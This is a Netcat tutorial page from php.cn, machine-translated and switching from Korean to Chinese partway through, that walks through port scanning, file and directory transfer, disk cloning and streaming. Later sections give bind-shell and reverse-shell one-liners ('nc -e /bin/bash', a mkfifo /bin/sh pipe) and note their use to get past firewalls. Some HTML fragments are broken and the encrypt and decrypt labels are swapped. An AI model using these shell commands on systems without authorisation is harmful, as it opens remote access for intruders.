Linux의 Netcat 명령

ringa_lee
풀어 주다: 2017-10-15 10:36:08
원래의
1792명이 탐색했습니다.

[소개] Netcat은 네트워크 도구의 만능 칼입니다. TCP와 UDP를 통해 네트워크에서 데이터를 읽고 쓸 수 있습니다. 이를 다른 도구와 결합하고 리디렉션하여 스크립트에서 다양한 방법으로 사용할 수 있습니다. Netcat 명령으로 수행할 수 있는 작업은 놀랍습니다. Netcat이 하는 일은 두 컴퓨터 사이에 연결을 설정하는 것입니다

Netcat은 네트워크 도구의 스위스 군용 칼입니다. Netcat은 TCP와 UDP를 통해 네트워크의 데이터를 읽고 쓸 수 있습니다. 이를 다른 도구와 결합하고 리디렉션하여 스크립트에서 다양한 방법으로 사용할 수 있습니다. Netcat 명령으로 수행할 수 있는 작업은 놀랍습니다.

Netcat이 하는 일은 두 컴퓨터 사이에 링크를 설정하고 두 개의 데이터 스트림을 반환하는 것뿐입니다. 그 후에 할 수 있는 일은 여러분의 상상에 달려 있습니다. 서버를 설정하고, 파일을 전송하고, 친구와 채팅하고, 미디어를 스트리밍하거나 다른 프로토콜의 독립 실행형 클라이언트로 사용할 수 있습니다.

다음은 Netcat 사용의 몇 가지 예입니다.

[A(172.31.100.7) B(172.31.100.23)]

Linux Netcat 명령 예:

1 포트 스캐닝

포트 스캐닝은 시스템 관리자가 자주 사용합니다. 해커 일부 시스템에서 열려 있는 포트를 검색하고 시스템의 취약점을 식별하는 데 사용됩니다.

$nc -z -v -n 172.31.100.7 21-25
로그인 후 복사

는 TCP 또는 UDP 모드에서 실행할 수 있습니다. -u 매개변수는 udp로 조정됩니다.

  • z 매개변수는 Netcat에 0 IO를 사용하도록 지시합니다. 즉, 연결이 닫히면 데이터가 없습니다. 교환됩니다 (번역자 주: 여기 번역은 정확하지 않습니다. 더 좋은 번역이 있으면 지적해주세요)

  • v 매개변수는 중복 옵션 사용을 의미합니다 (번역자 주: 자세한 출력)

  • n 매개변수 Netcat에게 DNS 역방향 쿼리 IP를 사용하지 말라고 지시합니다. 주소의 도메인 이름

이 명령은 21에서 25까지 열려 있는 모든 포트를 인쇄합니다. 배너는 텍스트입니다. 배너는 귀하가 연결된 서비스에서 귀하에게 보내는 문자 메시지입니다. 배너 정보는 취약점이나 서비스 유형 및 버전을 식별하려고 할 때 매우 유용합니다. 그러나 모든 서비스가 배너를 보내는 것은 아닙니다.

열린 포트를 찾으면 Netcat 연결 서비스를 사용하여 쉽게 배너를 가져올 수 있습니다.

$ nc -v 172.31.100.7 21
로그인 후 복사

Netcat 명령은 열린 포트 21에 연결하고 이 포트에서 실행되는 서비스의 배너 정보를 인쇄합니다.

채팅 서버

친구와 채팅하고 싶다면 사용할 수 있는 다양한 소프트웨어와 정보 서비스가 있습니다. 하지만 이렇게 고급스러운 구성이 없다면, 예를 들어 컴퓨터실에 있고 모든 외부 연결이 제한되어 있다면, 옆방에 하루 종일 앉아 있는 친구들과 어떻게 소통하시나요? 실망하지 마십시오. Netcat은 그러한 방법을 제공합니다. 채팅 서버, 미리 결정된 포트만 생성하면 그가 귀하에게 연락할 수 있습니다.

Server

$nc -l 1567
로그인 후 복사
로그인 후 복사
로그인 후 복사

Netcat 명령은 포트 1567에서 TCP 서버를 시작하고 모든 표준 출력 및 입력이 이 포트로 출력됩니다. 이 셸에는 출력과 입력이 모두 표시됩니다.

Client

$nc 172.31.100.7 1567
로그인 후 복사
로그인 후 복사

컴퓨터 B에 입력하는 모든 내용이 컴퓨터 A에 나타납니다.

3. 파일 전송

대부분의 경우 네트워크나 기타 도구를 통해 파일을 전송하려고 합니다. FTP, SCP, SMB 등 다양한 방법이 있지만 일시적으로 또는 한 번만 파일을 전송해야 하는 경우 컴퓨터에 소프트웨어를 설치하고 구성하는 데 시간을 낭비할 가치가 있습니다. file.txt 파일을 A에서 B로 전송한다고 가정해 보겠습니다. A 또는 B가 서버 또는 클라이언트 역할을 할 수 있습니다. 아래에서는 A가 서버 역할을 하고 B가 클라이언트 역할을 한다고 가정합니다.

Server

$nc -l 1567 <p>Client</p><pre class="brush:php;toolbar:false">$nc -n 172.31.100.7 1567 > file.txt
로그인 후 복사

여기서 A에 서버를 만들고 Netcat의 입력을 file.txt 파일로 리디렉션한 다음 누구든지 포트에 성공적으로 연결하면 Netcat은 file의 파일 내용을 보냅니다.

클라이언트 측에서는 출력을 file.txt로 리디렉션합니다. B가 A에 연결하면 A는 파일 내용을 보내고 B는 파일 내용을 file.txt에 저장합니다.

파일 소스를 다음과 같이 만들 필요가 없습니다. 서버에서는 반대 방법을 사용할 수도 있습니다. 아래와 같이 B에서 A로 파일을 보내고 있지만 서버는 A에 생성되었습니다. 이번에는 Netcat의 출력을 리디렉션하고 B의 입력 파일을 리디렉션하면 됩니다.

B as Server

Server

$nc -l 1567 > file.txt
로그인 후 복사

Client

nc 172.31.100.23 1567 <p>4. 디렉터리 전송</p><p>파일을 보내는 것은 매우 간단하지만 여러 파일 또는 전체 디렉터리를 보내려는 경우에도 매우 간단합니다. 압축 도구 tar를 사용하여 압축된 패키지를 압축하고 보냅니다. </p><p>네트워크를 통해 디렉터리를 A에서 B로 전송하려는 경우. </p><p>Server</p><pre class="brush:php;toolbar:false">$tar -cvf – dir_name | nc -l 1567
로그인 후 복사

Client

$nc -n 172.31.100.7 1567 | tar -xvf -
로그인 후 복사

여기 서버 A에서 tar 아카이브를 생성하고 콘솔에서 이를 통해 리디렉션한 다음 파이프를 사용하여 Netcat으로 리디렉션하면 Netcat이 네트워크를 통해 이를 보낼 수 있습니다.

클라이언트에서는 Netcat 파이프라인을 통해 압축된 패키지를 다운로드하고 파일을 엽니다.

대역폭을 절약하고 압축된 패키지를 전송하려면 bzip2 또는 기타 압축 도구를 사용할 수 있습니다.

Server

$tar -cvf – dir_name| bzip2 -z | nc -l 1567
로그인 후 복사

bzip2로 압축

Client

$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -
로그인 후 복사

bzip2를 사용하여 압축 해제

5. 네트워크를 통해 보내는 데이터를 암호화하세요

네트워크를 통해 보내는 데이터의 보안이 걱정된다면 다음을 수행하세요. mcrypt와 같은 도구를 사용하여 이전에 암호화되기 전에 데이터를 보냅니다.

서버 측

$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
로그인 후 복사

mcrypt 도구를 사용하여 데이터를 암호화하세요.

클라이언트

$mcrypt –flush –bare -F -q -m ecb <p>는 mcrypt 도구를 사용하여 데이터를 해독합니다. </p><p>以上两个命令会提示需要密码,确保两端使用相同的密码。</p><p>这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。</p><p>6. 流视频</p><p>虽然不是生成流视频的最好方法,但如果服务器上没有特定的工具,使用Netcat,我们仍然有希望做成这件事。</p><p>服务端</p><pre class="brush:php;toolbar:false">$cat video.avi | nc -l 1567
로그인 후 복사

这里我们只是从一个视频文件中读入并重定向输出到Netcat客户端

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -
로그인 후 복사

这里我们从socket中读入数据并重定向到mplayer。

7、克隆一个设备

如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。

克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上

Server

$dd if=/dev/sda | nc -l 1567
로그인 후 복사

Client

$nc -n 172.31.100.7 1567 | dd of=/dev/sda
로그인 후 복사

dd是一个从磁盘读取原始数据的工具,我通过Netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。

8、打开一个shell

我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用Netcat创建远程shell。

假设你的Netcat支持 -c -e 参数(默认 Netcat)

Server

$nc -l 1567 -e /bin/bash -i
로그인 후 복사

Client

$nc 172.31.100.7 1567
로그인 후 복사
로그인 후 복사

这里我们已经创建了一个Netcat服务器并且表示当它连接成功时执行/bin/bash

假如Netcat 不支持-c 或者 -e 参数(openbsd Netcat),我们仍然能够创建远程shell

Server

$mkfifo /tmp/tmp_fifo$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
로그인 후 복사

这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到Netcat 运行的端口1567上。至此,我们已经把Netcat的输出重定向到fifo文件中。

说明:从网络收到的输入写到fifo文件中

  • cat 命令读取fifo文件并且其内容发送给sh命令

  • sh命令进程受到输入并把它写回到Netcat。

  • Netcat 通过网络发送输出到client

至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。

9、在客户端仅仅简单连接到服务器

Client

$nc -n 172.31.100.7 1567
로그인 후 복사

你会得到一个shell提示符在客户端

反向shell

反向shell是人曾经在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

服务端

$nc -l 1567
로그인 후 복사
로그인 후 복사
로그인 후 복사

在客户端,简单地告诉Netcat在连接完成后,执行shell。

客户端

$nc 172.31.100.7 1567 -e /bin/bash
로그인 후 복사

现在,什么是反向shell的特别之处呢

反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为172.31.100.7,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。

10. 指定源端口

假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。

服务器端

$nc -l 1567
로그인 후 복사
로그인 후 복사
로그인 후 복사

客户端

$nc 172.31.100.7 1567 -p 25
로그인 후 복사

使用1024以内的端口需要root权限。

该命令将在客户端开启25端口用于通讯,否则将使用随机端口。

11、指定源地址

假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在Netcat中使用-s选项指定ip地址。

服务器端

$nc -u -l 1567 <p>客户端</p><pre class="brush:php;toolbar:false">$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt
로그인 후 복사

该命令将绑定地址172.31.100.5。

这仅仅是使用Netcat的一些示例。

其它用途有:

  • 使用-t选项模拟Telnet客户端,

  • HTTP客户端用于下载文件,

  • 连接到邮件服务器,使用SMTP协议检查邮件,

  • 使用ffmpeg截取屏幕并通过流式传输分享,等等。其它更多用途。

简单来说,只要你了解协议就可以使用Netcat作为网络通讯媒介,实现各种客户端。

Linux의 Netcat 명령

위 내용은 Linux의 Netcat 명령의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:php.cn
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿